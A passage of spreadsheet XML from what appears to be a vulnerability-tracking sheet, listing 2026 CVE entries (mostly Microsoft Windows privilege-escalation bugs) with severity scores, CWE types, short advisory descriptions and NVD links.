      <c r="L1447" s="5" t="inlineStr"/>
      <c r="M1447" s="5" t="inlineStr"/>
      <c r="N1447" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1447" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1447" s="5" t="inlineStr"/>
      <c r="Q1447" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1447" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Internet Connection Sharing (ICS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1447" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72926</t>
        </is>
      </c>
    </row>
    <row r="1448">
      <c r="A1448" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1448" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1448" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72930</t>
        </is>
      </c>
      <c r="D1448" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1448" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1448" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1448" s="5" t="inlineStr"/>
      <c r="H1448" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1448" s="5" t="inlineStr"/>
      <c r="J1448" s="5" t="inlineStr"/>
      <c r="K1448" s="5" t="inlineStr"/>
      <c r="L1448" s="5" t="inlineStr"/>
      <c r="M1448" s="5" t="inlineStr"/>
      <c r="N1448" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1448" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1448" s="5" t="inlineStr"/>
      <c r="Q1448" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1448" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Secure Socket Tunneling Protocol (SSTP) allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S1448" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72930</t>
        </is>
      </c>
    </row>
    <row r="1449">
      <c r="A1449" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1449" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1449" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72952</t>
        </is>
      </c>
      <c r="D1449" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1449" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1449" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1449" s="5" t="inlineStr"/>
      <c r="H1449" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1449" s="5" t="inlineStr"/>
      <c r="J1449" s="5" t="inlineStr"/>
      <c r="K1449" s="5" t="inlineStr"/>
      <c r="L1449" s="5" t="inlineStr"/>
      <c r="M1449" s="5" t="inlineStr"/>
      <c r="N1449" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1449" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1449" s="5" t="inlineStr"/>
      <c r="Q1449" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1449" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S1449" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72952</t>
        </is>
      </c>
    </row>
    <row r="1450">
      <c r="A1450" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1450" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1450" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72963</t>
        </is>
      </c>
      <c r="D1450" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1450" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1450" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1450" s="5" t="inlineStr"/>
      <c r="H1450" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1450" s="5" t="inlineStr"/>
      <c r="J1450" s="5" t="inlineStr"/>
      <c r="K1450" s="5" t="inlineStr"/>
      <c r="L1450" s="5" t="inlineStr"/>
      <c r="M1450" s="5" t="inlineStr"/>
      <c r="N1450" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1450" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1450" s="5" t="inlineStr"/>
      <c r="Q1450" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1450" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Modern Execution Server allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1450" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72963</t>
        </is>
      </c>
    </row>
    <row r="1451">
      <c r="A1451" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1451" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1451" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73003</t>
        </is>
      </c>
      <c r="D1451" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1451" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1451" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1451" s="5" t="inlineStr"/>
      <c r="H1451" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1451" s="5" t="inlineStr"/>
      <c r="J1451" s="5" t="inlineStr"/>
      <c r="K1451" s="5" t="inlineStr"/>
      <c r="L1451" s="5" t="inlineStr"/>
      <c r="M1451" s="5" t="inlineStr"/>
      <c r="N1451" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1451" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1451" s="5" t="inlineStr"/>
      <c r="Q1451" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1451" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1451" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73003</t>
        </is>
      </c>
    </row>
    <row r="1452">
      <c r="A1452" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1452" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1452" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73005</t>
        </is>
      </c>
      <c r="D1452" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1452" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1452" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1452" s="5" t="inlineStr"/>
      <c r="H1452" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1452" s="5" t="inlineStr"/>
      <c r="J1452" s="5" t="inlineStr"/>
      <c r="K1452" s="5" t="inlineStr"/>
      <c r="L1452" s="5" t="inlineStr"/>
      <c r="M1452" s="5" t="inlineStr"/>
      <c r="N1452" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1452" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1452" s="5" t="inlineStr"/>
      <c r="Q1452" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="R1452" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Authentication Methods allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1452" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73005</t>
        </is>
      </c>
    </row>
    <row r="1453">
      <c r="A1453" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1453" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1453" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73022</t>
        </is>
      </c>
      <c r="D1453" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1453" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1453" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1453" s="5" t="inlineStr"/>
      <c r="H1453" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1453" s="5" t="inlineStr"/>
      <c r="J1453" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K145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453" s="5" t="inlineStr"/>
      <c r="M1453" s="5" t="inlineStr"/>
      <c r="N1453" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1453" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1453" s="5" t="inlineStr"/>
      <c r="Q1453" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1453" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1453" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73022</t>
        </is>
      </c>
    </row>
    <row r="1454">
      <c r="A1454" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1454" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1454" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74236</t>
        </is>
      </c>
      <c r="D1454" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1454" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1454" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1454" s="5" t="inlineStr"/>
      <c r="H1454" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I1454" s="5" t="inlineStr"/>
      <c r="J1454" s="5" t="inlineStr"/>
      <c r="K1454" s="5" t="inlineStr"/>
      <c r="L1454" s="5" t="inlineStr"/>
      <c r="M1454" s="5" t="inlineStr"/>
      <c r="N1454" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1454" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P1454" s="5" t="inlineStr"/>
      <c r="Q1454" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R1454" s="5" t="inlineStr">
        <is>
          <t>GFI Exinda AI and ClearView before 7.6.5 contains a path traversal vulnerability in the diagnostic file deletion handler. The unlink_or_email_file() function accepts parameters prefixed with v_file_row_ and appends their values directly to a base directory path without sanitizing for directory traversal sequences. An authenticated attacker with Admin privileges can delete arbitrary files from the system in the context of root.</t>
        </is>
      </c>
      <c r="S1454" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74236</t>
        </is>
      </c>
    </row>
    <row r="1455">
      <c r="A1455" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1455" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1455" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77485</t>
        </is>
      </c>
      <c r="D1455" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1455" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1455" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1455" s="5" t="inlineStr"/>
      <c r="H1455" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1455" s="5" t="inlineStr"/>
      <c r="J1455" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K1455" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L1455" s="5" t="inlineStr"/>
      <c r="M1455" s="5" t="inlineStr"/>
      <c r="N1455" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1455" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1455" s="5" t="inlineStr"/>
      <c r="Q1455" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1455" s="5" t="inlineStr">
        <is>
          <t>Use after free in SQL Server allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1455" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77485</t>
        </is>
      </c>
    </row>
    <row r="1456">
      <c r="A1456" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1456" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1456" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77894</t>
        </is>
      </c>
      <c r="D1456" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1456" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1456" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1456" s="5" t="inlineStr"/>
      <c r="H1456" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1456" s="5" t="inlineStr"/>
      <c r="J1456" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K145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56" s="5" t="inlineStr"/>
      <c r="M1456" s="5" t="inlineStr"/>
      <c r="N1456" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1456" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1456" s="5" t="inlineStr"/>
      <c r="Q1456" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="R1456" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Installer allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1456" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77894</t>
        </is>
      </c>
    </row>
    <row r="1457">
      <c r="A1457" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1457" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1457" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77897</t>
        </is>
      </c>
      <c r="D1457" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1457" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1457" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1457" s="5" t="inlineStr"/>
      <c r="H1457" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1457" s="5" t="inlineStr"/>
      <c r="J1457" s="5" t="inlineStr"/>
      <c r="K1457" s="5" t="inlineStr"/>
      <c r="L1457" s="5" t="inlineStr"/>
      <c r="M1457" s="5" t="inlineStr"/>
      <c r="N1457" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1457" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1457" s="5" t="inlineStr"/>
      <c r="Q1457" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="R1457" s="5" t="inlineStr">
        <is>
          <t>Relative path traversal in Power Automate allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1457" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77897</t>
        </is>
      </c>
    </row>
    <row r="1458">
      <c r="A1458" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1458" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1458" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77899</t>
        </is>
      </c>
      <c r="D1458" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1458" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1458" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1458" s="5" t="inlineStr"/>
      <c r="H1458" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1458" s="5" t="inlineStr"/>
      <c r="J1458" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1458" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2012</t>
        </is>
      </c>
      <c r="L1458" s="5" t="inlineStr"/>
      <c r="M1458" s="5" t="inlineStr"/>
      <c r="N1458" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1458" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1458" s="5" t="inlineStr"/>
      <c r="Q1458" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1458" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Security Center allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1458" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77899</t>
        </is>
      </c>
    </row>
    <row r="1459">
      <c r="A1459" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1459" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1459" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77905</t>
        </is>
      </c>
      <c r="D1459" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1459" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1459" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1459" s="5" t="inlineStr"/>
      <c r="H1459" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1459" s="5" t="inlineStr"/>
      <c r="J1459" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K14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59" s="5" t="inlineStr"/>
      <c r="M1459" s="5" t="inlineStr"/>
      <c r="N1459" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1459" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1459" s="5" t="inlineStr"/>
      <c r="Q1459" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1459" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Management Instrumentation allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1459" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77905</t>
        </is>
      </c>
    </row>
    <row r="1460">
      <c r="A1460" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1460" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1460" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78457</t>
        </is>
      </c>
      <c r="D1460" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1460" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1460" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1460" s="5" t="inlineStr"/>
      <c r="H1460" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1460" s="5" t="inlineStr"/>
      <c r="J1460" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1460" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L1460" s="5" t="inlineStr"/>
      <c r="M1460" s="5" t="inlineStr"/>
      <c r="N1460" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1460" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1460" s="5" t="inlineStr"/>
      <c r="Q1460" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1460" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Security Health Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1460" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78457</t>
        </is>
      </c>
    </row>
    <row r="1461">
      <c r="A1461" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1461" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1461" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78464</t>
        </is>
      </c>
      <c r="D1461" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1461" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1461" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1461" s="5" t="inlineStr"/>
      <c r="H1461" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1461" s="5" t="inlineStr"/>
      <c r="J1461" s="5" t="inlineStr"/>
      <c r="K1461" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t>
        </is>
      </c>
      <c r="L1461" s="5" t="inlineStr"/>
      <c r="M1461" s="5" t="inlineStr"/>
      <c r="N1461" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1461" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1461" s="5" t="inlineStr"/>
      <c r="Q1461" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="R1461" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="S1461" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78464</t>
        </is>
      </c>
    </row>
    <row r="1462">
      <c r="A1462" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1462" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1462" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80093</t>
        </is>
      </c>
      <c r="D1462" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1462" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1462" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1462" s="5" t="inlineStr"/>
      <c r="H1462" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1462" s="5" t="inlineStr"/>
      <c r="J1462" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K146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462" s="5" t="inlineStr"/>
      <c r="M1462" s="5" t="inlineStr"/>
      <c r="N1462" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1462" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1462" s="5" t="inlineStr"/>
      <c r="Q1462" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1462" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1462" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80093</t>
        </is>
      </c>
    </row>
    <row r="1463">
      <c r="A1463" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1463" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1463" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81192</t>
        </is>
      </c>
      <c r="D1463" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1463" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1463" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1463" s="5" t="inlineStr"/>
      <c r="H1463" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1463" s="5" t="inlineStr"/>
      <c r="J1463" s="5" t="inlineStr"/>
      <c r="K1463" s="5" t="inlineStr"/>
      <c r="L1463" s="5" t="inlineStr"/>
      <c r="M1463" s="5" t="inlineStr"/>
      <c r="N1463" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1463" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1463" s="5" t="inlineStr"/>
      <c r="Q1463" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="R1463"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S1463" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81192</t>
        </is>
      </c>
    </row>
    <row r="1464">
      <c r="A1464" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1464" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1464" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81389</t>
        </is>
      </c>
      <c r="D1464" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1464" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1464" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1464" s="5" t="inlineStr"/>
      <c r="H1464" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1464" s="5" t="inlineStr"/>
      <c r="J1464" s="5" t="inlineStr"/>
      <c r="K1464" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L1464" s="5" t="inlineStr"/>
      <c r="M1464" s="5" t="inlineStr"/>
      <c r="N1464" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1464" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1464" s="5" t="inlineStr"/>
      <c r="Q1464" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1464" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S1464" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81389</t>
        </is>
      </c>
    </row>
    <row r="1465">
      <c r="A1465" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1465" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1465" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82062</t>
        </is>
      </c>
      <c r="D1465" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1465" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1465" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G1465" s="5" t="inlineStr"/>
      <c r="H1465" s="5" t="n">
        <v>0.004</v>
